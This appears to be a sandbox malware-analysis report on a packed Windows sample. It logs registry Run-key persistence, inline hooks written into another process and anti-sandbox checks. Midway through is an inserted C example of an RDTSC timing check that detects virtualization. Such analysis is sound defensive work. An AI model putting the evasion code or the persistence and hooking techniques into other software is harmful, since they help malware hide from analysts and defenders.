Source: C:\Users\user\Desktop\update.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041AAD0 GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary, 0_2_0041AAD0
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
Source: 16.exe.0.dr Static PE information: section name: .vmp0
Source: 16.exe.0.dr Static PE information: section name: .vmp1
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00481DA0 push eax; ret 0_2_00481DCE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00483FF4 push eax; ret 0_2_00484012
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00481DA0 push eax; ret 3_2_00481DCE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00483FF4 push eax; ret 3_2_00484012
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02188000 push eax; ret 7_3_0218802E
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004821B0 push eax; ret 7_2_004821DE
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00484854 push eax; ret 7_2_00484872
Source: update.exe.4.dr Static PE information: section name: .text entropy: 7.398153127263923
Source: C:\Users\user\Desktop\ 16.exe File created: \ 16.exe
Source: C:\Users\user\Desktop\ 16.exe File created: \ 16.exe
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe File created: C:\Users\user\Desktop\ 16.exe
Source: C:\Users\user\Desktop\ 16.exe File created: C:\Users\user\Desktop\update.exe
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 1
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 1

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 11A0005 value: E9 2B BA D3 75
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 76EDBA30 value: E9 DA 45 2C 8A
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 1210008 value: E9 8B 8E D1 75
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 76F28E90 value: E9 80 71 2E 8A
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 2CE0005 value: E9 8B 4D 39 73
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 76074D90 value: E9 7A B2 C6 8C
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 2CF0005 value: E9 EB EB 39 73
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 7608EBF0 value: E9 1A 14 C6 8C
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 2D00005 value: E9 8B 8A 8A 73
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 765A8A90 value: E9 7A 75 75 8C
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 2D10005 value: E9 2B 02 8C 73
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 765D0230 value: E9 DA FD 73 8C
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041E8A0 DestroyIcon,IsWindowVisible,IsIconic,IsZoomed,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMenu,DeleteMenu,GetSystemMenu, 0_2_0041E8A0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00422C90 IsIconic,IsZoomed,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,SystemParametersInfoA,IsWindow,ShowWindow, 0_2_00422C90
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041EF70 IsIconic,IsZoomed, 0_2_0041EF70
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004194E0 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus, 0_2_004194E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0047FE9F IsIconic,GetWindowPlacement,GetWindowRect, 0_2_0047FE9F
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041E8A0 DestroyIcon,IsWindowVisible,IsIconic,IsZoomed,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMenu,DeleteMenu,GetSystemMenu, 3_2_0041E8A0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00422C90 IsIconic,IsZoomed,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,SystemParametersInfoA,IsWindow,ShowWindow, 3_2_00422C90
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041EF70 IsIconic,IsZoomed, 3_2_0041EF70
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004194E0 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus, 3_2_004194E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0047FE9F IsIconic,GetWindowPlacement,GetWindowRect, 3_2_0047FE9F
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00480750 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect, 7_2_00480750
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00437210 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus, 7_2_00437210
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004438D0 IsIconic,IsZoomed,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsWindow,ShowWindow, 7_2_004438D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX (10 identical events)
Source: C:\Users\user\Desktop\ 16.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\update.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0046EA70 7_2_0046EA70
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00477AC0 7_2_00477AC0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00473DE0 7_2_00473DE0
Source: 16.exe, 00000004.00000002.1880621041.00000000007F0000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: SBIEDLL.DLL
Source: 16.exe, 00000004.00000002.1880621041.00000000007F0000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: SBIEDLL.DLL2E3
Source: C:\Users\user\Desktop\ 16.exe RDTSC instruction interceptor: First address: AEF537 second address: AEF53F instructions: 0x00000000 rdtsc 0x00000002 btr edx, ebp 0x00000005 xor cl, FFFFFFB7h 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ 16.exe RDTSC instruction interceptor: First address: A0401F second address: A04027 instructions: 0x00000000 rdtsc 0x00000002 btr edx, ebp 0x00000005 xor cl, FFFFFFB7h 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ 16.exe RDTSC instruction interceptor: First address: A1B927 second address: A1B929 instructions: 0x00000000 rdtsc 0x00000002 rdtsc
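The three RDTSC interceptor hits above are the classic VMProtect timing check: two RDTSC reads separated by a few filler instructions (btr, xor), with the difference compared against a threshold. On bare metal two back-to-back reads differ by a few dozen cycles; a hypervisor or sandbox that traps RDTSC (CR4.TSD) or single-steps the code inflates the gap by orders of magnitude, which is why the sandbox intercepts and emulates the instruction pair. The following is an added example written for this page, not code extracted from the sample or from the sandbox; it reproduces the measurement and the decision logic in portable C. The threshold (1000 cycles), the sample count and the function names are illustrative assumptions, not values recovered from 16.exe.

```c
/*
 * Added example (not from the sample or the report): the two-RDTSC
 * virtualization check as seen in the interceptor entries above.
 * Threshold and sample count are assumptions chosen for illustration.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>      /* __rdtsc() */
#define HAVE_RDTSC 1
#else
#define HAVE_RDTSC 0
#endif

/* One measurement: rdtsc, a little filler, rdtsc. The filler mirrors the
 * junk instructions the report shows between the two reads and keeps the
 * compiler from moving the reads; it has no other purpose. */
static uint64_t rdtsc_gap_once(void)
{
#if HAVE_RDTSC
    uint64_t t0 = __rdtsc();
    volatile unsigned char filler = 0xb7;   /* cf. "xor cl, 0xb7" above */
    filler ^= 0xb7;
    uint64_t t1 = __rdtsc();
    (void)filler;
    return t1 - t0;
#else
    /* Non-x86 fallback so the example still compiles: there is no TSC,
     * so measure two consecutive monotonic-clock reads in nanoseconds. */
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint64_t)((b.tv_sec - a.tv_sec) * 1000000000LL
                      + (b.tv_nsec - a.tv_nsec));
#endif
}

static int cmp_u64(const void *x, const void *y)
{
    uint64_t a = *(const uint64_t *)x, b = *(const uint64_t *)y;
    return (a > b) - (a < b);
}

/* Median of n samples (sorts the array in place). Using the median rather
 * than a single read keeps an interrupt or context switch that inflates one
 * reading on bare metal from producing a false "virtualized" verdict. */
uint64_t median_gap(uint64_t *samples, size_t n)
{
    qsort(samples, n, sizeof *samples, cmp_u64);
    return samples[n / 2];
}

/* The decision the packer makes: 1 = "looks virtualized/instrumented". */
int looks_virtualized(uint64_t median, uint64_t threshold)
{
    return median > threshold;
}

/* Collect n measurements and classify them. Returns 0/1, or -1 on OOM. */
int rdtsc_check(size_t n, uint64_t threshold, uint64_t *median_out)
{
    uint64_t *s = malloc(n * sizeof *s);
    if (!s) return -1;
    for (size_t i = 0; i < n; i++) s[i] = rdtsc_gap_once();
    uint64_t m = median_gap(s, n);
    free(s);
    if (median_out) *median_out = m;
    return looks_virtualized(m, threshold);
}

int main(void)
{
    uint64_t m;
    int v = rdtsc_check(1000, 1000, &m);   /* 1000 cycles: assumed threshold */
    printf("median rdtsc gap = %llu -> %s\n", (unsigned long long)m,
           v ? "virtualized/intercepted" : "bare metal");
    return v == 1;
}
```

The sandbox's counter-measure is exactly the "RDTSC instruction interceptor" entries above: it recognises the rdtsc/rdtsc pair and hands back a delta small enough to pass the threshold. When reproducing a check like this on your own analysis VM, expect the median to move with the hypervisor's RDTSC policy (pass-through, offset or trap), so a single threshold is never reliable across hosts; that unreliability is also why packers usually combine it with the SbieDll.dll module check and the PEB reads listed further down.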
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe API coverage: 6.0 %
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe API coverage: 5.5 %
Source: C:\Users\user\Desktop\update.exe API coverage: 3.7 %
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00473DE0 7_2_00473DE0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004801E0 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, 0_2_004801E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004927A8 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_004927A8
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00423610 FindFirstFileA,FindClose, 0_2_00423610
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041B240 FindNextFileA,FindClose,FindFirstFileA,FindClose, 0_2_0041B240
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00411EF0 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 0_2_00411EF0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004801E0 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, 3_2_004801E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004927A8 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 3_2_004927A8
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00423610 FindFirstFileA,FindClose, 3_2_00423610
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041B240 FindNextFileA,FindClose,FindFirstFileA,FindClose, 3_2_0041B240
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00411EF0 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 3_2_00411EF0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004929E2 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 7_2_004929E2
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00438DA0 FindNextFileA,FindClose,FindFirstFileA,FindClose, 7_2_00438DA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043BF10 FindFirstFileA,FindClose, 7_2_0043BF10
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0042FF90 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 7_2_0042FF90
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{Q
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000063E000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 16.exe, 00000004.00000002.1882625896.000000000137A000.00000004.00000020.00020000.00000000.sdmp, 16.exe, 00000004.00000003.1879496954.000000000137A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnto!
Source: C:\Users\user\Desktop\update.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ 16.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041AAD0 GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary, 0_2_0041AAD0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00407136 mov ebx, dword ptr fs:[00000030h] 0_2_00407136
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00407136 mov ebx, dword ptr fs:[00000030h] 3_2_00407136
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0040158F mov eax, dword ptr fs:[00000030h] 7_2_0040158F
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00440F30 GetProcessHeap,OleInitialize,GetModuleFileNameA,SetCurrentDirectoryA,LoadCursorA,GetStockObject,GetCurrentThreadId, 0_2_00440F30
Source: C:\Users\user\Desktop\ 16.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0048CA6A SetUnhandledExceptionFilter, 0_2_0048CA6A
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0048CA7C SetUnhandledExceptionFilter, 0_2_0048CA7C
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0048CA6A SetUnhandledExceptionFilter, 3_2_0048CA6A
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0048CA7C SetUnhandledExceptionFilter, 3_2_0048CA7C
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0048C457 SetUnhandledExceptionFilter, 7_2_0048C457
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0048C469 SetUnhandledExceptionFilter, 7_2_0048C469
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02184C10 cpuid 7_3_02184C10
Source: C:\Users\user\Desktop\ 16.exe Queries volume information: C:\ VolumeInformation (2 identical events)
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00483200 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 0_2_00483200
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0048CDBC GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 0_2_0048CDBC
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0049C369 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 0_2_0049C369
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00474C10 htons,bind,listen, 7_2_00474C10